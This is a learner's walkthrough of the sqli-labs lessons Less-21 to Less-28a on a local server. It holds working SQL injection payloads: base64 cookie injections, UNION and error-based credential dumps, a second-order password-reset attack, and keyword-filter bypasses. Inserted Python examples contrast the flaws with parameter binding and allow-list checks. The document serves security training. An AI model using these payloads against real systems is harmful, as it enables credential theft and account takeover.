Sqli-Labs-Less21-37

Cherish the present, live in the moment, act today

Less-21

1. First try the username and password we already know, both admin, and see:

2. The cookie is uname = YWRtaW4=, which indicates base64 encoding, so decode it (online encoder/decoder):
YWRtaW4= is admin. It really is base64, so the statements we construct must be base64-encoded too.

Still construct in the cookie: uname=admin' and extractvalue(1,concat('~',(select database()))) # which, encoded, is
uname=YWRtaW4nIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoJ34nLChzZWxlY3QgZGF0YWJhc2UoKSkpKSAj

The result is an error, so it is not closed by a single quote alone; there is an extra single quote. Try adding a parenthesis: uname=admin') and extractvalue(1,concat('~',(select database()))) # which, encoded, is
uname=YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KCd+Jywoc2VsZWN0IGRhdGFiYXNlKCkpKSkgIw==

No error this time, so it is closed by a single quote plus a parenthesis. But the content we need is not echoed, so this construction doesn't work. Adjust it: instead of using database() directly, construct admin') and extractvalue(1,concat('~',(select schema_name from information_schema.schemata limit 0,1))) # which, encoded, is YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

Success. Using database() here does not work; since I am still a beginner I cannot say why at the moment, and I hope someone more experienced can explain. The reason I rebuilt it here is that the construction below also started out with database(), which returned an error about more than one row. I figured database() should just refer to security and should not need limit n,1 to constrain it, so I rebuilt it in this form.

3. Try another construction: admin') and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)#
Encoded: YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

Success. The rest only needs small changes, but all the changing and re-encoding back and forth gave me a headache. This lesson also seemed to warn about a misconfigured date setting; I was busy with the lesson and did not get to it, so please ignore it. I later looked it up, and the fix is the one described under "It is not safe to rely on the system's timezone settings" (fix); the lessons below have already been taken care of.


Less-22

1. First try the username and password we already know, both admin, and see:

It feels similar to Less-21; even the returned image shows SQLI DUMB SERIES-21 (possibly a mix-up).

2. So try the cookie first again: submit the Less-21 statement: admin') and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)#
Encoded: YWRtaW4nKSBhbmQgKHNlbGVjdCAxIGZyb20gKHNlbGVjdCBjb3VudCgqKSxjb25jYXQoKHNlbGVjdCBzY2hlbWFfbmFtZSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5zY2hlbWF0YSBsaW1pdCAwLDEpLCc7JyxmbG9vcihyYW5kKCkqMikpIGFzIHggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIGdyb3VwIGJ5IHgpYXMgYSkj

An error is reported; the closing must be different.

3. Try a double quote: admin" and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),';',floor(rand()*2)) as x from information_schema.tables group by x)as a)# Encoded: YWRtaW4iIGFuZCAoc2VsZWN0IDEgZnJvbSAoc2VsZWN0IGNvdW50KCopLGNvbmNhdCgoc2VsZWN0IHNjaGVtYV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnNjaGVtYXRhIGxpbWl0IDAsMSksJzsnLGZsb29yKHJhbmQoKSoyKSkgYXMgeCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgZ3JvdXAgYnkgeClhcyBhKSM=

Success.
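Less-21 and Less-22 both hinge on a cookie that is merely base64-encoded. Encoding is not protection: anyone can decode the cookie, change it and re-encode it, so the server has to treat the decoded value as untrusted input exactly like a form field. The following Python example is added here and is not code from the original post or from sqli-labs; it decodes such a cookie, shows the string-splicing pattern the lab exhibits (as text only), and contrasts it with a parameter-bound lookup against an in-memory SQLite table that stands in for the lab's MySQL users table (table contents and the forged cookie are constructed for the example).

```python
import base64
import sqlite3


def decode_uname_cookie(cookie_value: str) -> str:
    """Decode the base64 'uname' cookie used by Less-21/22.

    base64 is reversible by anyone and carries no secret or integrity tag,
    so the decoded value is attacker-controlled data, nothing more.
    """
    return base64.b64decode(cookie_value).decode("utf-8")


def build_query_unsafe(uname: str) -> str:
    """The pattern the lab exhibits: the decoded cookie is spliced into SQL text.

    A quote inside the value ends the string literal early, which is why the
    write-up's payloads begin with a quote (plus a parenthesis for Less-21).
    Returned as a string only, to make the boundary break visible; it is never
    executed in this example.
    """
    return f"SELECT username FROM users WHERE username=('{uname}')"


def make_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's users table (SQLite, in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin"), ("dumb", "dumb")])
    return conn


def lookup_safe(conn: sqlite3.Connection, uname: str):
    """Parameter binding: the cookie content stays data, whatever characters it holds."""
    row = conn.execute("SELECT username FROM users WHERE username=(?)",
                       (uname,)).fetchone()
    return row[0] if row else None


def demo() -> tuple:
    genuine = decode_uname_cookie("YWRtaW4=")                    # cookie value from the write-up
    forged = base64.b64encode(b"admin') or '1'='1").decode()    # constructed forged cookie
    conn = make_demo_db()
    return (genuine,
            lookup_safe(conn, genuine),                          # real user: found
            lookup_safe(conn, decode_uname_cookie(forged)))      # forged name: no such user


if __name__ == "__main__":
    print(demo())
```

With binding, the forged cookie simply fails to match any username, because its quote and parenthesis are compared as characters rather than parsed as SQL; the base64 layer plays no part in that outcome either way.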


Less-23

1. Adding a single quote / a single quote plus a comment: http://localhost:8088/sqlilabs/Less-23/?id=1' --+ both give the same error:

That is, the comment marker has no effect; it is probably filtered.

2. So try closing the statement instead: success: http://localhost:8088/sqlilabs/Less-23/?id=1' and '1'='1

3. Use a UNION query: http://localhost:8088/sqlilabs/Less-23/?id=1' union select 1,2 and '1'='1 Adding columns one at a time shows there are three columns; otherwise it errors.

4. Construct to get the database name: http://localhost:8088/sqlilabs/Less-23/?id=-1' union select 1,(select schema_name from information_schema.schemata limit 0,1), '3

5. Straight to the final construction: http://localhost:8088/sqlilabs/Less-23/?id=-1' union select 1,(select concat(username,':',password) from users limit 1,1), '3


Less-24

1. The hint reads: second order injections *Real Treat* stored injections, i.e. second-order injection / a real treat / stored injection.
2. Open the page first: it allows creating a user and logging in, so create one to try. Created successfully:

3. Log in; the password can be changed:

4. Following the hint about stored injection, the idea is to construct a new username (testing shows the username is not filtered accordingly) so that when this user's password is updated, the update hits another account's password. Concretely, given that the password reset statement is: update table_name set password='new_password' where username='username' and password='password' ; construct the username: admin' or '1'='1 and create it. Log in and change the password; the executed statement should then be: update table_name set password='new_password' where username='admin' or '1'='1' and password='password' ; which changes the password of the account admin. For example, change the password to 123456.

After the change, logging in with password 123456 succeeds, so the construction worked. Looking at the table contents, both accounts' passwords have been changed.

This construction is actually flawed: because of the or, every account whose original password was admin gets its password changed to 123456, regardless of whether the username is admin (of course, the account named admin is certainly changed), because '1'='1' and password='admin' being true already satisfies the condition. That is exactly the subtlety of the universal statement.

5. It can also be constructed this way: username admin' # ; the executed statement is then: update table_name set password='new_password' where username='admin' #' and password='password' ; that is: update table_name set password='new_password' where username='admin' ; Testing shows it succeeds; this time the admin account's password was changed to qwert.
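The Less-24 flaw is that the reset query trusts the username because it was read back from the database or session, and the earlier escaping at registration stored the quote intact for exactly that later reuse. The example below is added here and is not code from the original post or from sqli-labs. It models the two halves of the second-order flow against a constructed in-memory SQLite users table (admin/admin and dumb/dumb plus the account registered during the test) and compares how many rows the reset touches when the update is built by string splicing, as in the lab, versus with bound parameters; the "admin' or '1'='1" username and the 123456 password are the ones from the write-up.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """Constructed stand-in for the lab's users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "admin"), ("dumb", "dumb")])
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> None:
    # Registration binds its values, so the name is stored exactly as typed,
    # quote included. That is the "stored" half of a second-order injection:
    # nothing bad happens yet.
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))


def reset_password_unsafe(conn, username, old_password, new_password) -> int:
    # The update trusts the username because it came from the database/session
    # and splices it into SQL text, so the stored quote becomes SQL syntax.
    # AND binds tighter than OR, so the WHERE clause the write-up shows becomes
    # username='admin' OR ('1'='1' AND password=<old>).
    sql = (f"UPDATE users SET password='{new_password}' "
           f"WHERE username='{username}' AND password='{old_password}'")
    return conn.execute(sql).rowcount


def reset_password_safe(conn, username, old_password, new_password) -> int:
    # Binding applies no matter where the value came from; "already in the
    # database" is not a trust boundary.
    return conn.execute(
        "UPDATE users SET password=? WHERE username=? AND password=?",
        (new_password, username, old_password)).rowcount


def password_of(conn: sqlite3.Connection, username: str) -> str:
    return conn.execute("SELECT password FROM users WHERE username=?",
                        (username,)).fetchone()[0]


def reset_demo(safe: bool) -> tuple:
    """Return (rows changed, admin's password, dumb's password) after the reset."""
    conn = make_demo_db()
    planted = "admin' or '1'='1"      # username from the write-up
    register(conn, planted, "admin")  # registered with password 'admin'
    reset = reset_password_safe if safe else reset_password_unsafe
    changed = reset(conn, planted, "admin", "123456")
    return changed, password_of(conn, "admin"), password_of(conn, "dumb")


if __name__ == "__main__":
    print("spliced :", reset_demo(safe=False))
    print("bound   :", reset_demo(safe=True))
```

The spliced version changes two rows (admin by name, the planted account by password) and leaves dumb alone, which is precisely the behaviour the write-up observed; the bound version changes only the account that actually requested the reset.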


Less-25

This lesson is fairly friendly: it gives plenty of hints, not only the error but also the content after filtering, and it says right at the start that and/or are unusable. After some trying, the closing turns out to be a single quote.

Using a UNION query

1. The restriction has little to do with UNION queries; group by shows 3 columns.
2. Use a UNION query and build the statement step by step; first get the database name: http://localhost:8088/sqlilabs/Less-25/?id=-1' union select 1,group_concat(schema_name),3 from information_schema.schemata --+ Error; the filtered content is:

3. This one is easy; change it to http://localhost:8088/sqlilabs/Less-25/?id=-1' union select 1,group_concat(schema_name),3 from infoorrmation_schema.schemata --+ Success.

4. Get the table names: http://localhost:8088/sqlilabs/Less-25/?id=-1' union select 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='security'--+
5. All quite simple; just add the corresponding letters wherever and/or appear.

Using substitutes and error-based injection

AND: && %26%26
OR: ||

1. Construct with extractvalue(): http://localhost:8088/sqlilabs/Less-25/?id=1' || extractvalue(1,concat(0x25,(select database())))--+

2. Same construction as before, so straight to the final one: http://localhost:8088/sqlilabs/Less-25/?id=1' || extractvalue(1,concat(0x25,(select concat(username,':',passwoorrd) from users limit 0,1)))--+

Source:

$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)


Less-25a

1. Adding a single quote gives an error. It later turns out to be numeric.
2. Construct the same way as in Less-25.
3. There are no error messages (it only indicates whether the statement has an error, i.e. the warning shown in the Less-25 screenshot; see the hint Warning:mysql_fetch_array() expects), so error-based injection is unusable; boolean-based and time-based can of course still be used.
Source:

$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)


Less-26

1. The hint says spaces and comments are filtered; I found that and, && and or are also blocked. Testing shows single-quote closing.

$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes

2. It seems only substitutes can be used; the substitutes for a space are: Blanks=('%09', '%0A', '%0B', '%0C', '%0D', '%0a')
3. I tried the substitutes above without success; leaving it for now.


Less-26a

Same as Less-26, but closed with a single quote plus a parenthesis.
Source:

$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes


Less-27

1. This time the filtered items are as follows (by this point I really could not keep trying by hand; the main job is finding substitutes. For readability I have pasted the source directly, and added it for the previous lessons as well):

$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select

2. Construction: http://localhost:8088/sqlilabs/Less-27/?id=0'%0aunIon%0aseLect%0a1,(seLect%0apassword%0afrom%0ausers%0awhere%0aid=1),'3


Less-27a

Same as Less-27, but closed with a double quote.
http://localhost:8088/sqlilabs/Less-27a/?id=0"%0aunIon%0aseLect%0a1,(seLect%0apassword%0afrom%0ausers%0awhere%0aid=1),"3
Source:

$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out Select
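The keyword-stripping filters of Less-25, Less-26 and Less-27/27a share one defect: a single deletion pass is not a sanitiser. It damages legitimate values that merely contain the letters (the write-up itself hits this with information_schema becoming infmation_schema), and whatever it misses passes through unchanged. The example below is added here and is not code from the original post or from sqli-labs. It translates the page's preg_replace() chains into Python re.sub() rules, applies them the way the lab does, and sets against them the allow-list check a numeric id parameter should receive instead; it goes slightly beyond the page by also showing an ordinary word mangled by the Less-25 rules. Rule lists, sample inputs and the accept_numeric_id / is_valid_id helpers are this example's own, not the lab's.

```python
import re

# Rule lists translated from the PHP preg_replace() calls shown in the write-up:
# (pattern, flags), applied in the order the lab applies them. Note that in the
# originals [--] is a character class matching a single '-', and [ +] matches
# one space or one literal '+', so neither pattern matches what its comment says.
LESS25 = [(r"or", re.I), (r"AND", re.I)]
LESS26 = [(r"or", re.I), (r"and", re.I), (r"[/*]", 0), (r"[-]", 0),
          (r"[#]", 0), (r"\s", 0), (r"[/\\]", 0)]
LESS27 = [(r"[/*]", 0), (r"[-]", 0), (r"[#]", 0), (r"[ +]", 0),
          (r"select", re.M), (r"[ +]", 0),
          (r"union", re.S), (r"select", re.S), (r"UNION", re.S),
          (r"SELECT", re.S), (r"Union", re.S), (r"Select", re.S)]


def apply_blacklist(value: str, rules) -> str:
    """One pass of the lab's filter chain: each rule deletes its matches, in order.

    Deletion is done once, so the output is not re-scanned; this is exactly
    the behaviour of the PHP lines on the page.
    """
    for pattern, flags in rules:
        value = re.sub(pattern, "", value, flags=flags)
    return value


def accept_numeric_id(value: str) -> int:
    """Allow-list check for the 'id' parameter: only a short decimal string passes.

    An allow-list validates the shape the parameter is supposed to have, so
    there is no keyword spelling to catch or to miss. Raises ValueError
    on anything else, before the value gets anywhere near SQL text.
    """
    if not re.fullmatch(r"[0-9]{1,10}", value):
        raise ValueError(f"id must be a decimal integer, got {value!r}")
    return int(value)


def is_valid_id(value: str) -> bool:
    """Boolean wrapper around accept_numeric_id for callers that prefer a flag."""
    try:
        accept_numeric_id(value)
        return True
    except ValueError:
        return False


def filter_report() -> dict:
    """Run a few constructed inputs through each chain to show both failure modes."""
    return {
        # legitimate identifier damaged by the Less-25 rules (the page's own observation)
        "less25_information_schema": apply_blacklist("information_schema", LESS25),
        # ordinary data damaged the same way: 'or' then 'And' are deleted
        "less25_Andorra": apply_blacklist("Andorra", LESS25),
        # Less-26 deletes whitespace, so even spaced-out legitimate text is altered
        "less26_sentence": apply_blacklist("1 and 2", LESS26),
        # Less-27 catches the exact spellings it lists ...
        "less27_exact": apply_blacklist("union select", LESS27),
        # ... and nothing else, as the page's mixed-case payload shows
        "less27_mixed_case": apply_blacklist("unIon seLect", LESS27),
    }


if __name__ == "__main__":
    for name, result in filter_report().items():
        print(f"{name:28s} -> {result!r}")
    print("id '1' valid:", is_valid_id("1"), "| id \"1'\" valid:", is_valid_id("1'"))
```

The report makes the trade-off concrete: the same rule that turns information_schema into infmation_schema also turns the country name Andorra into ra, while the Less-27 chain lets any spelling it did not enumerate through untouched. Validating id as an integer (and binding it) removes the whole class of problem, whereas extending the blacklist only shifts where its gaps are.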


Less-28

Source:

$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.

Closed with a single quote plus a parenthesis.


Less-28a

Source:

//$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
//$id= preg_replace('/[--]/',"", $id); //Strip out --.
//$id= preg_replace('/[#]/',"", $id); //Strip out #.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
//$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out spaces.

Closed with a single quote plus a parenthesis.

